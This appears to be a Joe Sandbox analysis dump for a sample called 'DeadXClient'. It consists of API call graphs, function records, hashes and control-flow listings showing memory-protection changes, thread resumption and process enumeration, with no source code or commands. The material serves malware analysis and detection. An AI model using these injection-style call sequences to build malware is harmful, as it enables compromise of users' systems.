10840->10842 10844 1c594800 VirtualFree 10840->10844 10841 1c596261 VirtualProtect FlushInstructionCache 10841->10845 10843 1c595210 3 API calls 10842->10843 10848 1c596343 10843->10848 10844->10842 10845->10840 10845->10841 10846 1c596397 10849 1c597d60 _handle_error 8 API calls 10846->10849 10847 1c596357 ResumeThread 10847->10848 10848->10846 10848->10847 10850 1c5963df 10849->10850 10859 1c59b590 10866 1c59d650 10859->10866 10867 1c59d3ec try_get_function 5 API calls 10866->10867 10868 1c59d678 TlsAlloc 10867->10868 11207 1c599210 11208 1c599240 _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 11207->11208 11209 1c599331 11208->11209 11210 1c5992fc RtlUnwindEx 11208->11210 11210->11208 11618 1c59e710 11621 1c59e694 11618->11621 11628 1c59aebc EnterCriticalSection 11621->11628 11656 1c59eb90 11657 1c59ebbd 11656->11657 11658 1c59b960 _set_errno_from_matherr 13 API calls 11657->11658 11663 1c59ebd2 11657->11663 11659 1c59ebc7 11658->11659 11660 1c59b840 _invalid_parameter_noinfo 30 API calls 11659->11660 11660->11663 11661 1c597d60 _handle_error 8 API calls 11662 1c59ef1f 11661->11662 11663->11661 10488 1c59e408 10489 1c59e413 10488->10489 10497 1c5a0c64 10489->10497 10510 1c59aebc EnterCriticalSection 10497->10510 10511 1c592408 10512 1c592484 _invalid_parameter_noinfo 10511->10512 10513 1c5924ea GetFileType 10512->10513 10520 1c5925c3 10512->10520 10514 1c5924f8 StrCpyW 10513->10514 10515 1c59250c 10513->10515 10517 1c592519 10514->10517 10522 1c5919d8 GetFinalPathNameByHandleW 10515->10522 10518 1c593c70 StrCmpNIW 10517->10518 10517->10520 10527 1c59330c StrCmpIW 10517->10527 10531 1c591cd4 10517->10531 10518->10517 10523 1c591a41 10522->10523 10524 1c591a02 StrCmpNIW 10522->10524 10523->10517 10524->10523 10525 1c591a1c lstrlenW 10524->10525 10525->10523 10526 1c591a2e StrCpyW 10525->10526 10526->10523 10528 1c59333e StrCpyW StrCatW 10527->10528 10529 1c593355 PathCombineW 10527->10529 10530 1c59335e 10528->10530 10529->10530 10530->10517 10532 1c591ceb 10531->10532 10533 1c591cf4 10531->10533 10534 1c59152c 2 API calls 10532->10534 10533->10517 10534->10533 11381 1c59a688 11382 1c59a69d 11381->11382 11383 1c59a6a1 11381->11383 11384 1c59cd58 43 API calls 11383->11384 11385 1c59a6a6 11384->11385 11393 1c59d250 GetEnvironmentStringsW 11385->11393 11388 1c59a6b3 11390 1c59b9f8 __free_lconv_mon 13 API calls 11388->11390 11390->11382 11392 1c59b9f8 __free_lconv_mon 13 API calls 11392->11388 11394 1c59d27e 11393->11394 11404 1c59d320 11393->11404 11397 1c59d1a0 WideCharToMultiByte 11394->11397 11395 1c59d32a FreeEnvironmentStringsW 11396 1c59a6ab 11395->11396 11396->11388 11405 1c59a6f4 11396->11405 11398 1c59d2d0 11397->11398 11399 1c59af2c 14 API calls 11398->11399 11398->11404 11400 1c59d2df 11399->11400 11401 1c59d309 11400->11401 11402 1c59d1a0 WideCharToMultiByte 11400->11402 11403 1c59b9f8 __free_lconv_mon 13 API calls 11401->11403 11402->11401 11403->11404 11404->11395 11404->11396 11406 1c59a71b 11405->11406 11407 1c59b980 _set_errno_from_matherr 13 API calls 11406->11407 11408 1c59a750 11407->11408 11411 1c59b980 _set_errno_from_matherr 13 API calls 11408->11411 11412 1c59a7b0 11408->11412 11414 1c59ac54 __std_exception_copy 30 API calls 11408->11414 11417 1c59a7e7 11408->11417 11418 1c59b9f8 __free_lconv_mon 13 API calls 11408->11418 11419 1c59a7bf 11408->11419 11409 1c59b9f8 __free_lconv_mon 13 API calls 11410 1c59a6c0 11409->11410 11410->11392 11411->11408 11422 1c59a7fc 11412->11422 11414->11408 11416 1c59b9f8 __free_lconv_mon 13 API calls 11416->11419 11420 1c59b860 _invalid_parameter_noinfo 17 API calls 11417->11420 11418->11408 11419->11409 11421 1c59a7f9 11420->11421 11423 1c59a801 11422->11423 11427 1c59a7b8 11422->11427 11424 1c59a82a 11423->11424 11425 1c59b9f8 __free_lconv_mon 13 API calls 11423->11425 11426 1c59b9f8 __free_lconv_mon 13 API calls 11424->11426 11425->11423 11426->11427 11427->11416 10122 1c59b980 10127 1c59b991 _set_errno_from_matherr 10122->10127 10123 1c59b9e2 10132 1c59b960 10123->10132 10124 1c59b9c6 HeapAlloc 10125 1c59b9e0 10124->10125 10124->10127 10127->10123 10127->10124 10129 1c599e44 10127->10129 10135 1c599e74 10129->10135 10141 1c59b4c4 GetLastError 10132->10141 10134 1c59b969 10134->10125 10140 1c59aebc EnterCriticalSection 10135->10140 10142 1c59b4eb 10141->10142 10143 1c59b4e6 10141->10143 10147 1c59b4f3 SetLastError 10142->10147 10168 1c59d728 10142->10168 10164 1c59d6e0 10143->10164 10147->10134 10151 1c59b53f 10154 1c59d728 _set_errno_from_matherr 6 API calls 10151->10154 10152 1c59b52f 10153 1c59d728 _set_errno_from_matherr 6 API calls 10152->10153 10156 1c59b536 10153->10156 10155 1c59b547 10154->10155 10157 1c59b54b 10155->10157 10158 1c59b55d 10155->10158 10180 1c59b9f8 10156->10180 10159 1c59d728 _set_errno_from_matherr 6 API calls 10157->10159 10185 1c59b0b4 10158->10185 10159->10156 10190 1c59d3ec 10164->10190 10169 1c59d3ec try_get_function 5 API calls 10168->10169 10170 1c59d756 10169->10170 10171 1c59d768 TlsSetValue 10170->10171 10172 1c59b50e 10170->10172 10171->10172 10172->10147 10173 1c59b980 10172->10173 10178 1c59b991 _set_errno_from_matherr 10173->10178 10174 1c59b9e2 10177 1c59b960 _set_errno_from_matherr 12 API calls 10174->10177 10175 1c59b9c6 HeapAlloc 10176 1c59b521 10175->10176 10175->10178 10176->10151 10176->10152 10177->10176 10178->10174 10178->10175 10179 1c599e44 _set_errno_from_matherr 2 API calls 10178->10179 10179->10178 10181 1c59b9fd HeapFree 10180->10181 10182 1c59ba2f 10180->10182 10181->10182 10183 1c59ba18 10181->10183 10182->10147 10184 1c59b960 _set_errno_from_matherr 12 API calls 10183->10184 10184->10182 10199 1c59af8c 10185->10199 10191 1c59d44d TlsGetValue 10190->10191 10197 1c59d448 try_get_function 10190->10197 10192 1c59d530 10192->10191 10194 1c59d53e GetProcAddress 10192->10194 10193 1c59d47c LoadLibraryExW 10195 1c59d49d GetLastError 10193->10195 10193->10197 10194->10191 10195->10197 10196 1c59d515 FreeLibrary 10196->10197 10197->10191 10197->10192 10197->10193 10197->10196 10198 1c59d4d7 LoadLibraryExW 10197->10198 10198->10197 10211 1c59aebc EnterCriticalSection 10199->10211 10535 1c594000 10536 1c593f4d _invalid_parameter_noinfo 10535->10536 10537 1c593f9d VirtualQuery 10536->10537 10538 1c593fb7 10536->10538 10539 1c594002 GetLastError 10536->10539 10537->10536 10537->10538 10539->10536 10539->10538 10540 1c59f004 10541 1c59f023 10540->10541 10542 1c59f09c 10541->10542 10545 1c59f033 10541->10545 10548 1c598620 10542->10548 10546 1c597d60 _handle_error 8 API calls 10545->10546 10547 1c59f092 10546->10547 10551 1c598634 IsProcessorFeaturePresent 10548->10551 10552 1c59864b 10551->10552 10557 1c5986d0 RtlCaptureContext RtlLookupFunctionEntry 10552->10557 10558 1c598700 RtlVirtualUnwind 10557->10558 10559 1c59865f 10557->10559 10558->10559 10560 1c598518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10559->10560 10870 1c59b184 10871 1c59b189 10870->10871 10875 1c59b19e 10870->10875 10876 1c59b1a4 10871->10876 10877 1c59b1ee 10876->10877 10878 1c59b1e6 10876->10878 10880 1c59b9f8 __free_lconv_mon 13 API calls 10877->10880 10879 1c59b9f8 __free_lconv_mon 13 API calls 10878->10879 10879->10877 10881 1c59b1fb 10880->10881 10882 1c59b9f8 __free_lconv_mon 13 API calls 10881->10882 10883 1c59b208 10882->10883 10884 1c59b9f8 __free_lconv_mon 13 API calls 10883->10884 10885 1c59b215 10884->10885 10886 1c59b9f8 __free_lconv_mon 13 API calls 10885->10886 10887 1c59b222 10886->10887 10888 1c59b9f8 __free_lconv_mon 13 API calls 10887->10888 10889 1c59b22f 10888->10889 10890 1c59b9f8 __free_lconv_mon 13 API calls 10889->10890 10891 1c59b23c 10890->10891 10892 1c59b9f8 __free_lconv_mon 13 API calls 10891->10892 10893 1c59b249 10892->10893 10894 1c59b9f8 __free_lconv_mon 13 API calls 10893->10894 10895 1c59b259 10894->10895 10896 1c59b9f8 __free_lconv_mon 13 API calls 10895->10896 10897 1c59b269 10896->10897 10902 1c59b054 10897->10902 10916 1c59aebc EnterCriticalSection 10902->10916 10918 1c59d984 GetProcessHeap 11629 1c59ab04 11630 1c59ab1d 11629->11630 11631 1c59ab35 11629->11631 11630->11631 11632 1c59b9f8 __free_lconv_mon 13 API calls 11630->11632 11632->11631 11664 1c592b84 11666 1c592be1 11664->11666 11665 1c592bfc 11666->11665 11667 1c5934ac 3 API calls 11666->11667 11667->11665 10851 1c59a13b 10854 1c59ac20 10851->10854 10855 1c59b348 33 API calls 10854->10855 10856 1c59ac29 10855->10856 10857 1c59acb4 33 API calls 10856->10857 10858 1c59ac3f 10857->10858 11633 1c597f3c 11634 1c597f60 __scrt_acquire_startup_lock 11633->11634 11635 1c599eb9 11634->11635 11636 1c59b4c4 _set_errno_from_matherr 13 API calls 11634->11636 11637 1c599ee2 11636->11637 10561 1c598430 10564 1c599538 10561->10564 10563 1c598459 10565 1c59958e __std_exception_destroy 10564->10565 10566 1c599559 10564->10566 10565->10563 10566->10565 10568 1c59ac54 10566->10568 10569 1c59ac6b 10568->10569 10570 1c59ac61 10568->10570 10571 1c59b960 _set_errno_from_matherr 13 API calls 10569->10571 10570->10569 10572 1c59ac86 10570->10572 10576 1c59ac72 10571->10576 10574 1c59ac7e 10572->10574 10575 1c59b960 _set_errno_from_matherr 13 API calls 10572->10575 10573 1c59b840 _invalid_parameter_noinfo 30 API calls 10573->10574 10574->10565 10575->10576 10576->10573 10611 1c5930b0 10612 1c5930e0 10611->10612 10613 1c593199 10612->10613 10614 1c5930fd PdhGetCounterInfoW 10612->10614 10614->10613 10615 1c59311b GetProcessHeap HeapAlloc PdhGetCounterInfoW 10614->10615 10616 1c59314d StrCmpW 10615->10616 10617 1c593185 GetProcessHeap HeapFree 10615->10617 10616->10617 10619 1c593162 10616->10619 10617->10613 10619->10617 10620 1c593558 StrCmpNW 10619->10620 10621 1c593586 StrStrW 10620->10621 10622 1c5935f6 10620->10622 10621->10622 10623 1c59359f StrToIntW 10621->10623 10622->10619 10623->10622 10624 1c5935c7 10623->10624 10624->10622 10630 1c591934 OpenProcess 10624->10630 10627 1c593c70 StrCmpNIW 10628 1c5935e8 10627->10628 10628->10622 10629 1c591bf4 2 API calls 10628->10629 10629->10622 10631 1c591968 K32GetModuleFileNameExW 10630->10631 10632 1c5919ba 10630->10632 10633 1c5919b1 CloseHandle 10631->10633 10634 1c591982 PathFindFileNameW lstrlenW 10631->10634 10632->10622 10632->10627 10633->10632 10634->10633 10635 1c5919a0 StrCpyW 10634->10635 10635->10633 11428 1c597eb0 11429 1c597eb9 __scrt_acquire_startup_lock 11428->11429 11431 1c597ebd 11429->11431 11432 1c59a500 11429->11432 11433 1c59a520 11432->11433 11442 1c59a537 11432->11442 11434 1c59a528 11433->11434 11435 1c59a53e 11433->11435 11436 1c59b960 _set_errno_from_matherr 13 API calls 11434->11436 11437 1c59cd58 43 API calls 11435->11437 11438 1c59a52d 11436->11438 11439 1c59a543 11437->11439 11440 1c59b840 _invalid_parameter_noinfo 30 API calls 11438->11440 11463 1c59c510 GetModuleFileNameW 11439->11463 11440->11442 11442->11431 11446 1c59a4a0 13 API calls 11447 1c59a5ad 11446->11447 11448 1c59a5cd 11447->11448 11449 1c59a5b5 11447->11449 11451 1c59a2e0 33 API calls 11448->11451 11450 1c59b960 _set_errno_from_matherr 13 API calls 11449->11450 11452 1c59a5ba 11450->11452 11456 1c59a5e9 11451->11456 11453 1c59b9f8 __free_lconv_mon 13 API calls 11452->11453 11453->11442 11454 1c59a5ef 11455 1c59b9f8 __free_lconv_mon 13 API calls 11454->11455 11455->11442 11456->11454 11457 1c59a61b 11456->11457 11458 1c59a634 11456->11458 11459 1c59b9f8 __free_lconv_mon 13 API calls 11457->11459 11460 1c59b9f8 __free_lconv_mon 13 API calls 11458->11460 11461 1c59a624 11459->11461 11460->11454 11462 1c59b9f8 __free_lconv_mon 13 API calls 11461->11462 11462->11442 11464 1c59c56a 11463->11464 11465 1c59c556 GetLastError 11463->11465 11466 1c59ad0c 33 API calls 11464->11466 11467 1c59b8f0 13 API calls 11465->11467 11468 1c59c598 11466->11468 11473 1c59c563 11467->11473 11470 1c59d614 5 API calls 11468->11470 11474 1c59c5a9 11468->11474 11469 1c597d60 _handle_error 8 API calls 11471 1c59a55a 11469->11471 11470->11474 11475 1c59a2e0 11471->11475 11473->11469 11481 1c59c3fc 11474->11481 11477 1c59a31e 11475->11477 11479 1c59a384 11477->11479 11495 1c59d108 11477->11495 11478 1c59a473 11478->11446 11479->11478 11480 1c59d108 33 API calls 11479->11480 11480->11479 11482 1c59c439 11481->11482 11484 1c59c420 11481->11484 11483 1c59d1a0 WideCharToMultiByte 11482->11483 11490 1c59c43e 11482->11490 11485 1c59c491 11483->11485 11484->11473 11487 1c59c498 GetLastError 11485->11487 11489 1c59c4c1 11485->11489 11485->11490 11486 1c59b960 _set_errno_from_matherr 13 API calls 11486->11484 11488 1c59b8f0 13 API calls 11487->11488 11491 1c59c4a5 11488->11491 11492 1c59d1a0 WideCharToMultiByte 11489->11492 11490->11484 11490->11486 11494 1c59b960 _set_errno_from_matherr 13 API calls 11491->11494 11493 1c59c4e8 11492->11493 11493->11484 11493->11487 11494->11484 11496 1c59d090 11495->11496 11497 1c59ad0c 33 API calls 11496->11497 11498 1c59d0b4 11497->11498 11498->11477 11499 1c5a16ab 11500 1c5a16eb 11499->11500 11501 1c5a1950 11499->11501 11500->11501 11503 1c5a1932 11500->11503 11504 1c5a171f 11500->11504 11502 1c5a1946 11501->11502 11506 1c5a2230 _log10_special 22 API calls 11501->11506 11507 1c5a2230 11503->11507 11506->11502 11510 1c5a2250 11507->11510 11511 1c5a226a 11510->11511 11512 1c5a224b 11511->11512 11514 1c5a2094 11511->11514 11512->11502 11515 1c5a20d4 _handle_error 11514->11515 11517 1c5a2140 _handle_error 11515->11517 11525 1c5a2350 11515->11525 11518 1c5a217d 11517->11518 11519 1c5a214d 11517->11519 11532 1c5a2688 11518->11532 11528 1c5a1f70 11519->11528 11522 1c5a217b _handle_error 11523 1c597d60 _handle_error 8 API calls 11522->11523 11524 1c5a21a5 11523->11524 11524->11512 11538 1c5a2378 11525->11538 11529 1c5a1fb4 _handle_error 11528->11529 11530 1c5a1fc9 11529->11530 11531 1c5a2688 _set_errno_from_matherr 13 API calls 11529->11531 11530->11522 11531->11530 11533 1c5a2691 11532->11533 11534 1c5a26a6 11532->11534 11535 1c5a269e 11533->11535 11537 1c59b960 _set_errno_from_matherr 13 API calls 11533->11537 11536 1c59b960 _set_errno_from_matherr 13 API calls 11534->11536 11535->11522 11536->11535 11537->11535 11539 1c5a23b7 _raise_exc _clrfp 11538->11539 11540 1c5a25cc RaiseException 11539->11540 11541 1c5a2372 11540->11541 11541->11517 11668 1c59dba8 11679 1c59aebc EnterCriticalSection 11668->11679 10636 1c595cac 10637 1c595cb3 10636->10637 10638 1c595ce0 VirtualProtect 10637->10638 10640 1c595bf0 10637->10640 10639 1c595d09 GetLastError 10638->10639 10638->10640 10639->10640 11542 1c59aaac 11545 1c59a878 11542->11545 11552 1c59a840 11545->11552 11550 1c59a7fc 13 API calls 11551 1c59a8a0 11550->11551 11553 1c59a850 11552->11553 11554 1c59a855 11552->11554 11555 1c59a7fc 13 API calls 11553->11555 11556 1c59a85c 11554->11556 11555->11554 11557 1c59a86c 11556->11557 11558 1c59a871 11556->11558 11559 1c59a7fc 13 API calls 11557->11559 11558->11550 11559->11558 11560 1c5a2aaf 11561 1c5a2ac7 11560->11561 11567 1c5a2b32 11560->11567 11561->11567 11568 1c59977c 11561->11568 11564 1c59977c 42 API calls 11565 1c5a2b29 11564->11565 11566 1c59ac20 33 API calls 11565->11566 11566->11567 11569 1c599798 9 API calls 11568->11569 11570 1c599785 11569->11570 11571 1c59978a 11570->11571 11572 1c59acb4 33 API calls 11570->11572 11571->11564 11573 1c599794 11572->11573 11680 1c592fa0 11682 1c592fc7 11680->11682 11681 1c593094 11682->11681 11683 1c592fe4 PdhGetCounterInfoW 11682->11683 11683->11681 11684 1c593006 GetProcessHeap HeapAlloc PdhGetCounterInfoW 11683->11684 11685 1c593038 StrCmpW 11684->11685 11686 1c593080 GetProcessHeap HeapFree 11684->11686 11685->11686 11688 1c59304d 11685->11688 11686->11681 11687 1c593558 12 API calls 11687->11688 11688->11686 11688->11687 10641 1c5a1ca0 10642 1c5a1cb1 CloseHandle 10641->10642 10643 1c5a1cb7 10641->10643 10642->10643

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00007FFD344F0E79 Relevance: 2.0, Strings: 1, Instructions: 732COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: SAM_^
                                                                                                                                                                                  • API String ID: 0-3658645246
                                                                                                                                                                                  • Opcode ID: 619595417986121512a315d21122e530da8b143682494209507da3141613d58d
                                                                                                                                                                                  • Instruction ID: d8c11bb5cfd8bd9c157b37fce0256b73989a74a049b4739bc7feedda59f4cfb0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 619595417986121512a315d21122e530da8b143682494209507da3141613d58d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D32C561B28A494FE7A8FB6C84B67B977D2FF99300F540579E04EC32C6DE68AC018741
                                                                                                                                                                                  Function 00007FFD344F7146 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 210 7ffd344f7146-7ffd344f7153 211 7ffd344f7155-7ffd344f715d 210->211 212 7ffd344f715e-7ffd344f7227 210->212 211->212 216 7ffd344f7229-7ffd344f7232 212->216 217 7ffd344f7293 212->217 216->217 218 7ffd344f7234-7ffd344f7240 216->218 219 7ffd344f7295-7ffd344f72ba 217->219 220 7ffd344f7279-7ffd344f7291 218->220 221 7ffd344f7242-7ffd344f7254 218->221 226 7ffd344f72bc-7ffd344f72c5 219->226 227 7ffd344f7326 219->227 220->219 222 7ffd344f7258-7ffd344f726b 221->222 223 7ffd344f7256 221->223 222->222 225 7ffd344f726d-7ffd344f7275 222->225 223->222 225->220 226->227 229 7ffd344f72c7-7ffd344f72d3 226->229 228 7ffd344f7328-7ffd344f73d0 227->228 240 7ffd344f73d2-7ffd344f73dc 228->240 241 7ffd344f743e 228->241 230 7ffd344f730c-7ffd344f7324 229->230 231 7ffd344f72d5-7ffd344f72e7 229->231 230->228 233 7ffd344f72eb-7ffd344f72fe 231->233 234 7ffd344f72e9 231->234 233->233 235 7ffd344f7300-7ffd344f7308 233->235 234->233 235->230 240->241 243 7ffd344f73de-7ffd344f73eb 240->243 242 7ffd344f7440-7ffd344f7469 241->242 250 7ffd344f746b-7ffd344f7476 242->250 251 7ffd344f74d3 242->251 244 7ffd344f7424-7ffd344f743c 243->244 245 7ffd344f73ed-7ffd344f73ff 243->245 244->242 246 7ffd344f7403-7ffd344f7416 245->246 247 7ffd344f7401 245->247 246->246 249 7ffd344f7418-7ffd344f7420 246->249 247->246 249->244 250->251 253 7ffd344f7478-7ffd344f7486 250->253 252 7ffd344f74d5-7ffd344f7566 251->252 261 7ffd344f756c-7ffd344f757b 252->261 254 7ffd344f7488-7ffd344f749a 253->254 255 7ffd344f74bf-7ffd344f74d1 253->255 257 7ffd344f749c 254->257 258 7ffd344f749e-7ffd344f74b1 254->258 255->252 257->258 258->258 259 7ffd344f74b3-7ffd344f74bb 258->259 259->255 262 7ffd344f7583-7ffd344f75e8 call 7ffd344f7604 261->262 263 7ffd344f757d 261->263 270 7ffd344f75ea 262->270 271 7ffd344f75ef-7ffd344f7603 262->271 263->262 270->271
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c2969127fd89227e33ffba8486d0229c945ebfaf6d3dc1670d4202c713e595a0
                                                                                                                                                                                  • Instruction ID: 4ed6b0166c6d625c4c9787e24bb5f796988515edfaa0504ff13247f91463c11e
                                                                                                                                                                                  • Opcode Fuzzy Hash: c2969127fd89227e33ffba8486d0229c945ebfaf6d3dc1670d4202c713e595a0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F1A531A08A8D8FEBA8DF28C8557E977E1FF55310F04427EE84DC7695CB78A8458B81
                                                                                                                                                                                  Function 00007FFD344F7EF2 Relevance: .5, Instructions: 452COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 272 7ffd344f7ef2-7ffd344f7eff 273 7ffd344f7f0a-7ffd344f7fd7 272->273 274 7ffd344f7f01-7ffd344f7f09 272->274 278 7ffd344f7fd9-7ffd344f7fe2 273->278 279 7ffd344f8043 273->279 274->273 278->279 281 7ffd344f7fe4-7ffd344f7ff0 278->281 280 7ffd344f8045-7ffd344f806a 279->280 288 7ffd344f806c-7ffd344f8075 280->288 289 7ffd344f80d6 280->289 282 7ffd344f8029-7ffd344f8041 281->282 283 7ffd344f7ff2-7ffd344f8004 281->283 282->280 285 7ffd344f8008-7ffd344f801b 283->285 286 7ffd344f8006 283->286 285->285 287 7ffd344f801d-7ffd344f8025 285->287 286->285 287->282 288->289 290 7ffd344f8077-7ffd344f8083 288->290 291 7ffd344f80d8-7ffd344f80fd 289->291 292 7ffd344f80bc-7ffd344f80d4 290->292 293 7ffd344f8085-7ffd344f8097 290->293 297 7ffd344f816b 291->297 298 7ffd344f80ff-7ffd344f8109 291->298 292->291 295 7ffd344f809b-7ffd344f80ae 293->295 296 7ffd344f8099 293->296 295->295 299 7ffd344f80b0-7ffd344f80b8 295->299 296->295 301 7ffd344f816d-7ffd344f819b 297->301 298->297 300 7ffd344f810b-7ffd344f8118 298->300 299->292 302 7ffd344f811a-7ffd344f812c 300->302 303 7ffd344f8151-7ffd344f8169 300->303 308 7ffd344f820b 301->308 309 7ffd344f819d-7ffd344f81a8 301->309 304 7ffd344f8130-7ffd344f8143 302->304 305 7ffd344f812e 302->305 303->301 304->304 307 7ffd344f8145-7ffd344f814d 304->307 305->304 307->303 310 7ffd344f820d-7ffd344f82e5 308->310 309->308 311 7ffd344f81aa-7ffd344f81b8 309->311 321 7ffd344f82eb-7ffd344f82fa 310->321 312 7ffd344f81ba-7ffd344f81cc 311->312 313 7ffd344f81f1-7ffd344f8209 311->313 314 7ffd344f81d0-7ffd344f81e3 312->314 315 7ffd344f81ce 312->315 313->310 314->314 317 7ffd344f81e5-7ffd344f81ed 314->317 315->314 317->313 322 7ffd344f82fc 321->322 323 7ffd344f8302-7ffd344f8364 call 7ffd344f8380 321->323 322->323 330 7ffd344f836b-7ffd344f837f 323->330 331 7ffd344f8366 323->331 331->330
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2e2a90e60151a2f47ee5ff48b2921496c351d4d3f51eb3d262a5b448fa9e92f9
                                                                                                                                                                                  • Instruction ID: 78baec6bacd12f5cc1316852df3bae74ad943978f6a109fd32e8f27d7c9aca0d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e2a90e60151a2f47ee5ff48b2921496c351d4d3f51eb3d262a5b448fa9e92f9
                                                                                                                                                                                  • Instruction Fuzzy Hash: C1E1B231A08A4E8FEBA8DF28C8A57E977D1FF55311F05423AD84DC7295CF78A8508B81
                                                                                                                                                                                  Function 00007FFD344F1799 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bb18b126b664e2c868a77ba717f12a0c79d0597705395d2d88dab019b2f6c5ce
                                                                                                                                                                                  • Instruction ID: de658ae4c202cb4274fc34db6502c945aefaa61a663cd75d9491ca8f3fa0cb6a
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb18b126b664e2c868a77ba717f12a0c79d0597705395d2d88dab019b2f6c5ce
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2251002170D6C90FE796A76848B5275BFD1EF97215B0800FBE08DC31A7DD585C06C342
                                                                                                                                                                                  Function 00007FFD344F87D1 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 162 7ffd344f87d1-7ffd344f880a 164 7ffd344f880c-7ffd344f8818 162->164 165 7ffd344f881a-7ffd344f8820 164->165 166 7ffd344f8867-7ffd344f886c 164->166 165->166 167 7ffd344f8822-7ffd344f884b call 7ffd344f5b10 165->167 170 7ffd344f886d 166->170 173 7ffd344f8850-7ffd344f8852 167->173 172 7ffd344f886f-7ffd344f8876 170->172 174 7ffd344f8854-7ffd344f8857 173->174 175 7ffd344f8860-7ffd344f8865 173->175 174->166 176 7ffd344f8859-7ffd344f885c 174->176 175->172 176->164 177 7ffd344f885e 176->177 177->170
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                  • Opcode ID: 440bba8a040fbea5834ff4ced82e23e4772573a70c4bcb8047a413d0e20fcef9
                                                                                                                                                                                  • Instruction ID: 784cbcd160d1aa8b02afa8adefb30c24a0e677bf3b815b199d86556ed1ecacb8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 440bba8a040fbea5834ff4ced82e23e4772573a70c4bcb8047a413d0e20fcef9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 19112932E0C6594FEB54AB6488692FD7BA0EF46300F42017BDA09E7182DB6D9C509381
                                                                                                                                                                                  Function 1C59B980 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 178 1c59b980-1c59b98f 179 1c59b99f-1c59b9af 178->179 180 1c59b991-1c59b99d 178->180 182 1c59b9c6-1c59b9de HeapAlloc 179->182 180->179 181 1c59b9e2-1c59b9ed call 1c59b960 180->181 188 1c59b9ef-1c59b9f4 181->188 183 1c59b9b1-1c59b9b8 call 1c59e770 182->183 184 1c59b9e0 182->184 183->181 190 1c59b9ba-1c59b9c4 call 1c599e44 183->190 184->188 190->181 190->182
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,1C59B521,?,?,?,1C59B969,?,?,?,?,1C59BA1D), ref: 1C59B9D5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
